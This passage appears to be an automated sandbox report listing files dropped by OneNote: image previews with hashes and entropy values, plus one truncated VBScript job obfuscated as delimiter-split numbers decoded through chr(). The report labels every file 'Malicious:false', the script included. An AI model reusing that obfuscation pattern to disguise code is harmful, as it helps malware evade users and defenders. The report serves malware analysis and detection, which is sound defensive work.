                                                                                                        Preview:.PNG........IHDR.......Y.....?.......sRGB.........gAMA......a.....pHYs..........o.d....IDATx^.]ip...fu.VBBZ..V'.>........CR......?r...pU\....v*...T~.U)0..('`....."..,a..Y..$t!...D...Mkvf4.VhW;S........{...zZw...i......fj..$..7......[Z*.[.[..Zk...?.t:M..,..`.^...X,..sUK[..Rg.=$..!.3<....74...iY..i...k.,.fA..Z.n...`G.%..H.l7..7J...u.R..6....E..!....N@.....M....Q`...U2.w.WP[!fX......c ./@7Mz....^...k.)....v.Q`..z..1A..P.{...||...vY.....>.`...K...m.?CX./v.8.....]..;...6..kw......N....z.Q...f..q..xk.5....;.?.Z.c...`......4....?.....VV.u~..<_......sU4e.....g.c.G....O/..r...`.G)....#d5.O..w..{....twL1l.)#&hF..K...M[@.Dl..V2..j.3..s....3M.....v..!....V..c..B...|..e.1....7.WA0.[.\.u.).$7f.+.......8..e2K/.%.Ii..`w6w.E..[?_.?.?..I.k2.s....]..f....HM.?w..d.9..Rr....Y.c.}.s.zk..rc...a..I(9~........m...Z............I........7.K:.:Bf.......m..1.......&..,...?a...c.@.@.g%...s.#...;..c6...g.lZ....}.WX.3.8.....W....N.w...L...}....?.".......;cI.............pS
                                                                                                        Process:C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
                                                                                                        File Type:PNG image data, 167 x 92, 8-bit/color RGB, non-interlaced
                                                                                                        Category:dropped
                                                                                                        Size (bytes):4181
                                                                                                        Entropy (8bit):7.943341403425058
                                                                                                        Encrypted:false
                                                                                                        SSDEEP:96:b6JWqvCl45Da8kuGzhRwZvwIutfij19MQ8EpW14LBGJVCq:b6JTCl45DalsBws1R8914V5q
                                                                                                        MD5:817D5A35EDB2B0E052194D4F49FDA19C
                                                                                                        SHA1:FA6CB2016C5F43B76102B63D60359139227E07EA
                                                                                                        SHA-256:0A87B8418B7F8E6E117BADDA11D7CDD38B8B7320C6BA3D3E9AF93EB9ACB2CE14
                                                                                                        SHA-512:E0686BDBFC589401F0EAAE2B1598199EFA285F8392742B1C928B9274088804B23DCB584B6FEF68CE6D7E54DFF9C10338104F4C0F3F80A04471F0B2E8F9935CC0
                                                                                                        Malicious:false
                                                                                                        Preview:.PNG........IHDR.......\......!2a....sRGB.........gAMA......a.....pHYs..........o.d....IDATx^.]iPTW..iv..D.....%DQ#A$...d..h,.T~..+...TM\cj*.)k.fj~L~$...L&...,...:.FdU..f_......._.n.m.....q.s.9.=..w.9......$..b.*..%....@A]A..%..<......l.h.+../..OSe.....]...>..C........^cCy.0nz.4<......g..?~..>.1ws.B....07W65.74T....=..v.......D....6.....tR....}]}....4z..^....7..;.."......^.....|=.#.=.32..o.<.Tn*Q....g.zN...n*...!/.........!....F..]...6...m...CX..~...+..U...E.|.........7]=rE?i(..$`e.%.`.....w._.Y...l.1...@....t.P..=.}..*...N...N.|.xS.5&.....Pe......Z.Z^XJkx.....^.....?7..._....Wsz......}G..]...\.....,[.y....}.J....'.R?a...G5..l.i.?....MH..l.DC^._.c.m.....%{;z.&.*+x;...S.....zxyH..`.._]...el^........U.T..^..p..z[.6(2x..,#;o##..}Zv|Z..............V.....0}Z....]..m.....x..).k]&e.._.W!Vry..%...I..d..}w.....^..\............m[.^.3r.......-8......j....>...Q..T..{\V\ptH.?........1..w....FHl...x.....\.`.ei.w..)`...g..V{..Z.....8..........o.._..
                                                                                                        Process:C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
                                                                                                        File Type:PNG image data, 454 x 278, 8-bit/color RGB, non-interlaced
                                                                                                        Category:dropped
                                                                                                        Size (bytes):8184
                                                                                                        Entropy (8bit):7.807848176906598
                                                                                                        Encrypted:false
                                                                                                        SSDEEP:192:ExqMHYnnEnntvA4Mesu3SXHycmfIEFQp1r/:E0MGEn29esuiXHt0FQp1
                                                                                                        MD5:5B386BF9A20766956A84F67F913F23D7
                                                                                                        SHA1:6E72E51F5B4FA64E52D2B80B41409B3DB927A3C7
                                                                                                        SHA-256:DDF6A1D5B29BD69C65A148B1247FDE8389CC56865E4398E4CBDCBD68A6555043
                                                                                                        SHA-512:99B4109439D9A688D7747C6847E0FF7399CDA01A89C3181789F913E757A82EE4727F95E506F4B01930EFC7C6E229B94BB89E385B56BC009AB5CFE332585660C5
                                                                                                        Malicious:false
                                                                                                        Preview:.PNG........IHDR.............s>.Q....sRGB.........gAMA......a.....pHYs..........o.d....IDATx^...]...!.......!.YTP.A......-..r..$.E.J.I;....T.M.UE[..Q..x....wKB=.m...4.%..|:...9...\{..o.3..g.o~..~s...k...X.r....... ..@Gggg.?.... P_.]]]..*Iu....C...h..$...:... ..... .\.......@R..... ..$.k....@0.Hj0.8... ..r.@....F.I...G.....T...@.... ..P........5...@ ..$5.J.A...@R.. ....#...C.#.@..H*... ..`...`(q...@.I..... ......%. ... .\.......@R..... ..$.k....@0.Hj0.8... ..r.@....F.I...G.....T...@.... ..P........5...@ ..$5.J.A...@R.. ....#...C.#.@..H*... ..`...`(q...@.I..... ......%. ... .\.......@R..... ..$.k....@0.Hj0.8... ..r.@....F.I...G.....T...@.... ..P........5...@ ..$5.J.A..............W_...1c.l..6..`...@ ..I.S..I.I'...5.\..;....'1. ...........c..k.u.Qs..}..g#b.j.@..Y..QR...n.!...-......h..Z.......Xw.U.~q... ..@.%.'............. P..E.T.b.:j.(F..p.... .C.}3.'.|..z..w.a.....\{.:.4[.lY..~...x..'/....g....J..9.K_...'...:..;)......SO=u..E... Py.qf..}O7.o....u?:....6~~..9...?7.
                                                                                                        Process:C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
                                                                                                        File Type:PNG image data, 230 x 68, 8-bit/color RGB, non-interlaced
                                                                                                        Category:dropped
                                                                                                        Size (bytes):4181
                                                                                                        Entropy (8bit):7.950380155401321
                                                                                                        Encrypted:false
                                                                                                        SSDEEP:96:L6ousL3eslFAmjb89xK6YiSTwtw5dTA1W9lQ:GoFiUFAMbsxJYieZ5dGklQ
                                                                                                        MD5:BC6C08F8C2C6D1EEE95ABFC40C3C3669
                                                                                                        SHA1:44DE7375375880ACC24938D7E92A837E85C35321
                                                                                                        SHA-256:6E54B502C46E1AFA57E28B8ACCCE24F102399F31407827A91E4CD7A42FCBC746
                                                                                                        SHA-512:2AF4A9B87FA4F362926CD77F272CECBE3ED4F0E110FB8F30F661DF7C61B77B9FD8E7716EEF9177B1038B68C792CA4F844F729DAA48B2E38B9945EC9CB44BB720
                                                                                                        Malicious:false
                                                                                                        Preview:.PNG........IHDR.......D.............sRGB.........gAMA......a.....pHYs..........o.d....IDATx^.yp.....E-.......-v...VY.a.d....R.euF.).KH@.*B..u@YdQ....!&.tjg.!.,a'.L..@H...{'\~yy.....w2z...s.=..;..s.......]..j..b5d.j.X...2D......r.\.#..f...Bl.....5dC....r...............:m.....s..j.f..jK....y.^....'8.....<......g.....=.%..2.p..}<.....G.....Ix.m.4dm..B.......0?..+_.*..c..n.......?....wa..l...p....E.Ly.}...*...C.D.vy).....@.>\...3;.`].q..m../.d.B.../......~.p.U..'...sP\....YH.7.../....R!...O...'.....s....<|.f)....i.{.I..l.a.n...?~.{...h...s.e..-..Q..R..@<;.y.G.+n.....Y.Y'.V.}.o._..?...,.>}..\w....`+.}.{.p"d.RO=&.v..H].....k...X.c..z.{........}.n....s:c...i7N...|....*\..O.*....)w..[>..E..}y....q..u.!.z.D.[`Uf.Y...>z\..x.B.h" \.}...`...|._.....G...hY.../..6>..Z...8^..k.E.5d#..a."....P.CR....OL..U...qY.{.C.<~I=V..x.J..*k.Y....z.;?..^...3.4|i...[DL,..z].._..a.....(s./...W~..q*.\#@[R.N...@.."..=....\q...<.......p...+J..\#...(.,....OQ...$L...G...
                                                                                                        Process:C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
                                                                                                        File Type:PNG image data, 221 x 77, 8-bit/color RGB, non-interlaced
                                                                                                        Category:dropped
                                                                                                        Size (bytes):2599
                                                                                                        Entropy (8bit):7.903700862190034
                                                                                                        Encrypted:false
                                                                                                        SSDEEP:48:PmCwDJh8w9JewaF2zQNXXj8zq1KM43sxXxjYbTgJW1MFsrJ075CawGjGj:P1Ah8UewaFcgz82Kx8xXNYb3id/yj
                                                                                                        MD5:E88131C9AAC52649FF044905ACAB9B76
                                                                                                        SHA1:34AE73B9165CBED0DDF33AC20E4B3E7D622C19BF
                                                                                                        SHA-256:30F22340F582F9A352A7ED3048D1088F178E83CCAACAC1CCFD86852C8F9C78E3
                                                                                                        SHA-512:97AFE8F3A2A3138613934AC737C390A35F6757BFC3D381EA7C7CD148F739932380DCD46D0BA6F590C274F8BFB4D4286B3C0433AA69E090102A8A9ABDD7C97EB1
                                                                                                        Malicious:false
                                                                                                        Preview:.PNG........IHDR.......M.............sRGB.........gAMA......a.....pHYs..........o.d....IDATx^.]kl.U....B|E..>...*..Q........b[.K........m.(..... ...!%1%*-B.C~(&`[.....-.....~.w3..Kw.3wvfzn.2{..s.....{w..\....!.3..:..!..../..zD.x...O.K... ^.1*...8.G...z...D.$...........>!..V..`v.CQQQ!..-L...../3.2......ZH.?s...Iu\N..,3.?.p..N......<....E.<.=z..Iu<ll.dX...g....+.{X.p.....:..t...a...cKK.|...Yszl.N.:......KPs.):).T.5...&B...*..5j``@...(_r.V.j..m...?x.sg...t\.dz.'^.=.\.h..<.y....:.I...w..ze.m.\.qPJu.....D.|..@......W..t.+.....X....e....\H+.Ns%^r.VS.N.3:...&...._..#^....d! ..F.....xc..M...q...17.z...z&C...K9(.Ifm.35.v.>.'X,...p.:=.H...J.K.,...:~...7.t.....R..R..9..?....l../.(...0z0.M.f.)H..Y_"e......B........L...q.K......|;..L.........xI.K3.M..%........./..){....R....s...7....).q.._R.4O.a3......<..%....3#.|>..y...u...R'.P..$Klz...........,...g.....`.7..\...x>.{p\;>+.,.....e.-..Re@.N..FY_....*....]}...[..h.M.oq.S.U...c_}`......8TP....
                                                                                                        Process:C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
                                                                                                        File Type:PNG image data, 232 x 50, 8-bit/color RGB, non-interlaced
                                                                                                        Category:dropped
                                                                                                        Size (bytes):1570
                                                                                                        Entropy (8bit):7.780157858994452
                                                                                                        Encrypted:false
                                                                                                        SSDEEP:48:r+em8Tlk2APr2fEd72tTqiVJlcLzqeVzYwS:r+erTlk5S+zoyGahS
                                                                                                        MD5:EF9AA5B2ADBE5DF68AC4F4D716DF7708
                                                                                                        SHA1:363B93AAAB9DB2832F6CA0EE3C27C9310C344BA8
                                                                                                        SHA-256:3D94FCC4821A135ABAAE6579011441B94F9C04DAD1E66BB5211B0C019A5968B9
                                                                                                        SHA-512:EC9B024AEA46F7B97D14F0A7E12704D09B85F0017CC9E273CE50F2F889DFDAE81DE549CCD546BBB8F8BAAAAAB7781FEF77BF783E02CCC9605304552F7DD5903D
                                                                                                        Malicious:false
                                                                                                        Preview:.PNG........IHDR.......2......n.f....sRGB.........gAMA......a.....pHYs..........o.d....IDATx^.[MK.W...t!.fU..b!....*JBA......%-.F.4$.Nw].....E.$...)T......?@.O{...3w..y.=/"o.9...<.y...X....c.1P6..e.lx....0..J....e3.&\.@)............o.*>.E,;.....~..|....Z.3`K..W0S.&.L._..M.e.`..M.....i_.......\...6g..^....4..L.Y.9.$M...4..L.Y.9.$M...4..L.Y.9.$M...4..L.Y.9.$M...4..2.......q...&...........*.Qg.+.p.......a.:.X6...o2......A.....[).,.p......P......_..>......3.......z8j............>...fww.6....../....S<......^%.4........{.N$..`.!H....`........a..(.G^>~|txx....K\mF..'d.d:9J!.....j..i24.A...`O.......s.....?={....H'._..~..O......*>...ZXX.3...;C....\....%..s=...w<h.......0....~..y..._.......+.n.P.M]c...A..Er|.R...$.g...9*._.jg.....x...&+.JWM4xe..^....0...11.[.....f....r#.h.h$....[=t >...r....L.0.KL..B\..x........4J.0....vY...\dA. w...........g....};.}.....;.......x.|.....)......x....s....N.$.n..g<Z.q.a9.C.....oX..%,KNNN..i.8J..p].1....B>{......n.D|3t.-\g...Q
                                                                                                        Process:C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
                                                                                                        File Type:PNG image data, 453 x 278, 8-bit/color RGB, non-interlaced
                                                                                                        Category:dropped
                                                                                                        Size (bytes):11449
                                                                                                        Entropy (8bit):7.91552812501629
                                                                                                        Encrypted:false
                                                                                                        SSDEEP:192:/zgGDSJ0ke0kBER0C31jm1OSZi6/ccccccc3zzRmKHDr1NFnAaLJ5rBX8iaD7:/UGe6m7XdJS86kvRBHD5/nAa95rB9aD7
                                                                                                        MD5:163E6791C87E4999C343EC5E23843B15
                                                                                                        SHA1:43CE3BAE19E22876483A7FD0E93DB45790373600
                                                                                                        SHA-256:DEB2B126977EA150E49CDB3ACF4F5387639C7B7B5583454EDF55ADF83DFAB720
                                                                                                        SHA-512:98BE1F4684F99A9FD2F313B09A113B5C310EC8BA8EB0EBF5FD69765E5B48B001D39999E3F25A7E76C7344DCF57B4F0BF2E4614FB0E0DFCCB6F02E6D1CAAF7FDD
                                                                                                        Malicious:false
                                                                                                        Preview:.PNG........IHDR................R....sRGB.........gAMA......a.....pHYs..........o.d..,NIDATx^....E...@^.T.....H..$..(.!..3....O=Q...<.9.`@E...CE.(""..H.$..6.......]3......tW}U...w*~....W./. .. ..........m..H..H... ..........'...G...W.=#.M.$@.$p...........!@=U.VH..H.z.g..H........H+$@.$@=.3@.$@.j.PO.p... ...... .. .5...j8......PO..........o....+.Z.Pb.FH.......D.g\........._..'0.......9.>............&..PO.z..)-..........R....'@=U..I.&.g......../....SO.\.,._.@7Q.g.}V+../..Ht.I=..WZ%.{......_v.....%U.)^H(!!..q....|.H.E.DG_....o../...T.i...z.%.4K..# %.-.(...4J`i..,.P....F.D.zj..#..@.).(...o.....S..)..i.z.g...h..8.......A<d.z....<...n.]...E....(Jj4P;._.N..Q...)..8U.u.e).j.e...E|.]."..t6.[.K..5.6.....B..(.=W./....S'.......z.FY.. ...PO.".tI...F...Q....c.o.....}...r>..3c9I../.......}......I..G.|..|...~.b.e.5.OGb..o.....w....i.e...5&.,Z.H......g..KY.<.nZ.x...HHbdS.Z.\.O..1Q.K...9....Z.L....\g#.._~9###%%.O.>.Rvu..C.....S..g01..j...?-../...Q..N.:._....1.!
                                                                                                        Process:C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
                                                                                                        File Type:HTML document, ASCII text, with very long lines (792), with CRLF line terminators
                                                                                                        Category:dropped
                                                                                                        Size (bytes):55113
                                                                                                        Entropy (8bit):5.216959514455489
                                                                                                        Encrypted:false
                                                                                                        SSDEEP:768:n9Te2jdcdTeNtu1t/nl8BFWVyeaNhvsbsS:9TVdaeNtuXndH
                                                                                                        MD5:AE25F2104967B2708AC9DBA80AAC52FD
                                                                                                        SHA1:7AC0150B43CBB5EEBA9A0F956E1291DF6790F3BF
                                                                                                        SHA-256:11B3D1564B12934489281250C9A683F076FE10254BFDD7DA72307E538838EC56
                                                                                                        SHA-512:D4A7F95631E7EB88FDADBE66D31BF9C7459D0F80CA2C9174952AAD42BFF6262241B25916E6A089F778990BE981A2CF220BAA69AD261314247C286397553DECCA
                                                                                                        Malicious:false
                                                                                                        Preview:<job id="cucuparu">..<script language="VBScript">..fastenedy = fastenedy + ("\ocw40599\ocw39558\ocw37476\ocw34353\ocw38517\ocw40599\ocw38170\ocw40252\ocw21167\ocw17003\ocw4511")..megamouthy = "megamouthy"..girlohy = girlohy + ("sycrwf\ocwfalsetreatedyextenuatingywhomytreatedy")..mendy = "mendy"..waryfishy = mid(girlohy,7,4)..'tegerytegery..elementumy = Split(fastenedy,waryfishy,-1,0)..wonderingy = "wonderingy"..for prepossessedy = 1 to Ubound(elementumy)...jestinglyy = jestinglyy & chr(Clng(elementumy(prepossessedy)) / 347)..Next..'wonderingywonderingy..fastenedy = fastenedy + ("\ocw39905\ocw35047\ocw40252\ocw11104\ocw35394\ocw39905\ocw38517\ocw34006\ocw36782\ocw35047\ocw34353\ocw40252\ocw21167\ocw34353\ocw39558\ocw35047\ocw33659\ocw40252\ocw35047\ocw38517\ocw34006\ocw36782\ocw35047\ocw34353\ocw40252\ocw13880\ocw11798\ocw39905\ocw34353\ocw39558\ocw36435\ocw38864\ocw40252\ocw36435\ocw38170\ocw35741\ocw15962\ocw35394\ocw36435\ocw37476\ocw35047\ocw39905\ocw41987\ocw39905\ocw40252\ocw35047
                                                                                                        Process:C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
                                                                                                        File Type:PNG image data, 32 x 32, 8-bit/color RGBA, non-interlaced
                                                                                                        Category:dropped
                                                                                                        Size (bytes):567
                                                                                                        Entropy (8bit):7.499095532051442
                                                                                                        Encrypted:false
                                                                                                        SSDEEP:12:6v/7iQug6mbURgVowGtrjzeC/Gl2QL26YnQQNZTw61VeDp:PRgVqtrjSC/MJ26YQot3E
                                                                                                        MD5:D055CE625528E448C61315EAAEF5BB71
                                                                                                        SHA1:029DF4C872B1C154F32E7FE94F434547C3BA6192
                                                                                                        SHA-256:85BF1E672B4E86E9AF0C7874681EC9620DFDC78E0335B83EEF38C17D813B6705
                                                                                                        SHA-512:705B6B729E967FA946469571109AA892F5CB55A01C74D40AE02140D10CBF9B65DD5E511C06EBFE494E407742F8C6F4FBBE88664B78B37ABFB2F19DB1F66F4247
                                                                                                        Malicious:false
                                                                                                        Preview:.PNG........IHDR... ... .....szz.....sRGB.........pHYs..........o.d....IDATXG.V... ..7.^z....d},C...X.Zg.J..f..LA=1....9.9.....Oq.........Y..8.eYB.....y.-.....-..lh.ueM...:l..M.h..Z.d5..........e.Av....(..B...~..u.....Z6..x.[.p.x.{|..cb....J....j.O........{..[.DW..k..].m..%pD...<5..u...2....Y...F.B...............x.cb.....r.....c.HS..Dk....a.$v_a....2a....Up.....V.`.D+..B..t;FcBs..^......R.mT.).V;n.$.29..KM....Z..w.s'....@i@./..h..6..P.Z...a....2.....".z... @......P>..{.....3I.:P2..z{v&.B.....+.......G.>4.....}.#.m..9...|...a<!..d....IEND.B`.
                                                                                                        Process:C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
                                                                                                        File Type:JPEG image data, Exif standard: [TIFF image data, little-endian, direntries=0], baseline, precision 8, 1248x1624, components 3
                                                                                                        Category:dropped
                                                                                                        Size (bytes):49224
                                                                                                        Entropy (8bit):7.402134460714453
                                                                                                        Encrypted:false
                                                                                                        SSDEEP:1536:orJJmT4HVnteV4FrdMiYcx7bfCb6HPdnX2:EvSMVnte8ZP1Y6Jm
                                                                                                        MD5:B7FC313714EDD7866F4C76527282C2B5
                                                                                                        SHA1:C86217B46956933FAE4A30483A63B33F34B8C503
                                                                                                        SHA-256:B6D25F5EB52D5C24EF6C325BD25F18E413F3E23D20413A3693749275BA4B192C
                                                                                                        SHA-512:038A73B7A69DD976C964F1538F5B4F7C6C64721E4F2F1A831815598FAAE84CAC53305C03F5CEA6E66ACDC110A9A5117EEE191345EA004B9576C752122F8D88F7
                                                                                                        Malicious:false
                                                                                                        Preview:......Exif..II*.................Ducky.......-.....+http://ns.adobe.com/xap/1.0/.<?xpacket begin="." id="W5M0MpCehiHzreSzNTczkc9d"?> <x:xmpmeta xmlns:x="adobe:ns:meta/" x:xmptk="Adobe XMP Core 5.3-c011 66.145661, 2012/02/06-14:56:27 "> <rdf:RDF xmlns:rdf="http://www.w3.org/1999/02/22-rdf-syntax-ns#"> <rdf:Description rdf:about="" xmlns:xmp="http://ns.adobe.com/xap/1.0/" xmlns:xmpMM="http://ns.adobe.com/xap/1.0/mm/" xmlns:stRef="http://ns.adobe.com/xap/1.0/sType/ResourceRef#" xmp:CreatorTool="Adobe Photoshop CS6 (Windows)" xmpMM:InstanceID="xmp.iid:CFCF3A6CA8A811EDBBF3936CDCD6FAAD" xmpMM:DocumentID="xmp.did:CFCF3A6DA8A811EDBBF3936CDCD6FAAD"> <xmpMM:DerivedFrom stRef:instanceID="xmp.iid:CFCF3A6AA8A811EDBBF3936CDCD6FAAD" stRef:documentID="xmp.did:CFCF3A6BA8A811EDBBF3936CDCD6FAAD"/> </rdf:Description> </rdf:RDF> </x:xmpmeta> <?xpacket end="r"?>....Adobe.d....................................................... ..,+++,1111111111............................................!!..!!))())
                                                                                                        Process:C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
                                                                                                        File Type:JPEG image data, JFIF standard 1.02, aspect ratio, density 100x100, segment length 16, baseline, precision 8, 612x792, components 3
                                                                                                        Category:dropped
                                                                                                        Size (bytes):40884
                                                                                                        Entropy (8bit):7.545929039957292
                                                                                                        Encrypted:false
                                                                                                        SSDEEP:768:MCBOA4d+ElOXJ/3pI7cRBiL7L6qERqGz65WXzZqJsKQSbIsTT6XB:hIAU+2cGdLX6qBG4WDZl4Ihx
                                                                                                        MD5:7379775A1E2AB7FAB95CFFCE01AE05F3
                                                                                                        SHA1:3D3DDFD8AC7E07203561BAE423D66F0806833AB3
                                                                                                        SHA-256:9301DB6D2D87282FCEE450189AEACE16D85F64273BF62713A3044992B6B7A9E9
                                                                                                        SHA-512:4B5006E620E80D3A146944649CF4CA619782CAD7E8C4CD0D1DE0EBCA0FA05EACB7378DAFCEED3E26F5698B07F19604614D906C8F51F898660E2F129D8DEC6F62
                                                                                                        Malicious:false
                                                                                                        Preview:......JFIF.....d.d......Ducky.......d......Adobe.d...................................................................................................................................................d............................................................................................!.1A.....Qaq....".....2....BR#S..br...3T...C$.7(Hx....4D.G..Xh.cs..'..t...%...8.....................1...!AQ..a...q"2.4Tt.......R3S....Br...#s...Uu.bc.de..$D..6..C%E..............?...z...;sB.yv...........]t.\...n...../....m....M.=.3G+..x+.....S).*&.J../..8..O/+..sG...p...<!....~.c..C.w..,[oHom.wc-.J.~.......L[..6...'..i_..S;...!Y.z.q].EK..M.x...i.x.+.;.+...}....#......f.)........e6V..p.;........s.)..Ml.J......IU.6...<9+9.^..l..Y...[._...2..^..j.ia...._..3.;...~..<3...;......z.^.......]..Qk.,...Yk...3.3Jy^p.}....q...I...&..t.......;..9.g.GH;..'...%...)..[..y..../...zCn..>...'...1e.Y..;....]..7...N>t..m-.j.............H^..T\.q.ru...}...eTn]I'r.^].#..wOY....v
                                                                                                        Process:C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
                                                                                                        File Type:JPEG image data, JFIF standard 1.02, resolution (DPI), density 72x72, segment length 16, Exif Standard: [TIFF image data, big-endian, direntries=7, orientation=upper-left, xresolution=98, yresolution=106, resolutionunit=2, software=Adobe Photoshop 7.0, datetime=2004:03:04 13:19:29], progressive, precision 8, 221x792, components 3
                                                                                                        Category:dropped
                                                                                                        Size (bytes):24268
                                                                                                        Entropy (8bit):6.946124661664625
                                                                                                        Encrypted:false
                                                                                                        SSDEEP:384:d2wiieoHTRh5a1HAteZCWOZIM+L7WhNjYn:8wHFHJ+/OZIKhNO
                                                                                                        MD5:3CD906D179F59DDFA112510C7E996351
                                                                                                        SHA1:48CDB3685606EDD79D5BCDF0D7267B8B1CCBD5A8
                                                                                                        SHA-256:1591FD26E7FFF5BE97431D0ED3D0ADE5CFC5FA74E3D7EC282FD242160CE68C1F
                                                                                                        SHA-512:2048CBA13AF532FF2BCC7B8B40541993234BD1A8AB6DE47B889AF3F3E4571F9C5A22996D0B1C16DD6603233F6066A1A2A97C16A6020BEDD0826B83BAD0075512
                                                                                                        Malicious:false
                                                                                                        Preview:......JFIF.....H.H......Exif..MM.*.............................b...........j.(...........1.........r.2...........i.................H.......H....Adobe Photoshop 7.0.2004:03:04 13:19:29.....................................................................................(.....................&...................H.......H..........JFIF.....H.H......Adobe_CM......Adobe.d...................................................................................................................................................$.."................?..........................................................................3......!.1.AQa."q.2.....B#$.R.b34r..C.%.S...cs5....&D.TdE.t6..U.e...u..F'...............Vfv........7GWgw........................5.....!1..AQaq"..2.....B#.R..3$b.r..CS.cs4.%......&5..D.T..dEU6te....u..F...............Vfv........'7GWgw.................?.....)......[]t.\Z..g......A....&D.$LH._..X..Xl...`....cZ.X.........>......f.Z.X...]..~L.S..@..I$..I.IO.....x...s.g.[f.h{9..
                                                                                                        Process:C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
                                                                                                        File Type:JPEG image data, JFIF standard 1.02, aspect ratio, density 100x100, segment length 16, baseline, precision 8, 612x792, components 3
                                                                                                        Category:dropped
                                                                                                        Size (bytes):39010
                                                                                                        Entropy (8bit):7.362726513389497
                                                                                                        Encrypted:false
                                                                                                        SSDEEP:768:6tCjwO+E+KW0ZtOgepcoWW4pAWQ6/KWcR474HOAZaDfK:68j+E+KW0HOgep/72/NKWcRNefK
                                                                                                        MD5:9700DE02720CDB5A45EDE51F1A4647EC
                                                                                                        SHA1:CF72A73E1181719B1CC45C2FE0A6B619081E115E
                                                                                                        SHA-256:7E6A7714A69688D9FFDF16AA942B66064A0C77FCD9B3E469F89730B4B9290C3E
                                                                                                        SHA-512:5438921467D62376472007B9EBF3C35C9D9FE3EDE04D99A990129332D53EBC8EE2555C0319A4F7C0DF63516F29CEDF2171D8B6DC34C9FCD075C2CA41EB728660
                                                                                                        Malicious:false
                                                                                                        Preview:......JFIF.....d.d......Ducky.......d......Adobe.d...................................................................................................................................................d.........................................................................................!1..A...Qaq..".......2BR#...b%&6..'w.r.3f7W8.s5EUeF.g....CS$4.Vv..Tdt..G..(c..u.Hhx.......................!1.AQa..2.q....".s...3.4BRr.#......b.$c............?........uf.....t...;..[...W.h.....-.k.f..i.u..KQ..b.F...rM%/.8n.S..=9.....G$O;.f.}L..N..U._i.[.X...3.~....S.~..+t$...c.5......{..X/..#.G...}s....6......^....o~.$.\WA?...^*w[O.~..6..~....a....~..:..0.......{O...|.s.u._w.........i...........{K...._.?.../{.....A..8....<g.iu..<..................X......|]v....D..9.k.w.|-IF.Tv.-.&.........."'.4.b....z.._.Z.....G...u.xyt./_.q..m>..S.V.Xdc.bw.T.W......g..........}s.._..?....U]_.......`......>.|'.~xH....,...?........?.q....o../..R..;...Y.G....A"?......?.<..1...w..o.M.........tco.
                                                                                                        Process:C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
                                                                                                        File Type:JPEG image data, JFIF standard 1.02, aspect ratio, density 100x100, segment length 16, baseline, precision 8, 612x792, components 3
                                                                                                        Category:dropped
                                                                                                        Size (bytes):59707
                                                                                                        Entropy (8bit):7.858445368171059
                                                                                                        Encrypted:false
                                                                                                        SSDEEP:1536:k76rvGc8WKC2/UX1uEgVRY/jvv9CblyL/T:k77Z5C2/Ow1e9CblCT
                                                                                                        MD5:47ADB0DF6FDA756920225A099B722322
                                                                                                        SHA1:851946B8C2BD0BB351BAEECA9E5BB6648A87D7CA
                                                                                                        SHA-256:EC8CD7250F3D82E900E99114869777EE859EC73EFFABED108815F65742078C3A
                                                                                                        SHA-512:85A9920E1CE4A2FCCEBAFA425C925DF33580FA3C3C00178F058539B2FBC0163866DB8A41B320E2EF2CD217F00FFA06A1A831C728D3F9F910C9EAC58B5DA76E2D
                                                                                                        Malicious:false
                                                                                                        Preview:......JFIF.....d.d......Ducky.......d......Adobe.d...................................................................................................................................................d............................................................................................!1..A..Qaq"....2........B#..R.b3$..8xrC4&'W.%e.(.c.d.5E6Ff..h..SsTt..u...Gg..H.....................!.1..AQ.aq.".......2..st.BR..56.r#3.b.S.4c%...$d.CT............?....3.7...G:../P....z..K.:6..w......6....... .z7...~.....{gdF60...9....{...'[N....m.........z...g{.......7...4..1..=.z...._..p...m..Icd.~.v..9.P..0Z(.<j.......R6zm.....v.z...>x..)=g........zo{..w..f..y.t.....%.D..#.}.I.>).H.QM..cLD..x.../.^y.{.............y.=^.......I.T.......U..0_?...u..og..3.ky..K....6w...Dc......~........ik.z....N...en......_.....x....._u...4.{..P...>.....}.......>.R.....m.....[mt.....}.........|.....m......~....B.F.]C.36..q....yg...{]...+.DZv.9<.o..;..N.n&im.,....w.3...V.s...Y..e#$.
                                                                                                        Process:C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
                                                                                                        File Type:JPEG image data, JFIF standard 1.02, resolution (DPI), density 72x72, segment length 16, Exif Standard: [TIFF image data, big-endian, direntries=7, orientation=upper-left, xresolution=98, yresolution=106, resolutionunit=2, software=Adobe Photoshop 7.0, datetime=2004:03:04 13:18:09], progressive, precision 8, 164x641, components 3
                                                                                                        Category:dropped
                                                                                                        Size (bytes):27862
                                                                                                        Entropy (8bit):7.238903610770013
                                                                                                        Encrypted:false
                                                                                                        SSDEEP:384:LTawAZvhbrXzDc6LERLQ/b5vXOl6pXQ/wD5OUMrdRUUhCplQg0ESSz:6wm/vT/b4wxoqbdUhWnSs
                                                                                                        MD5:E62F2908FA5F7189ED8EEBD413928DEE
                                                                                                        SHA1:CA249B4A70924B73BDA52972E9C735AEC35A0C5D
                                                                                                        SHA-256:20ABE389C885E42B6EBE9E902976229BB6FD63C8C34CB61AA70B8B746209F90A
                                                                                                        SHA-512:EE8D1821A918BE8714F431895E7223D08036E88A4FDB9A5485EFF246640EE969A69A8AA4E2E9DDC35BA75FB6D4E95092A286E90B477BD6998C313639C2C31F25
                                                                                                        Malicious:false
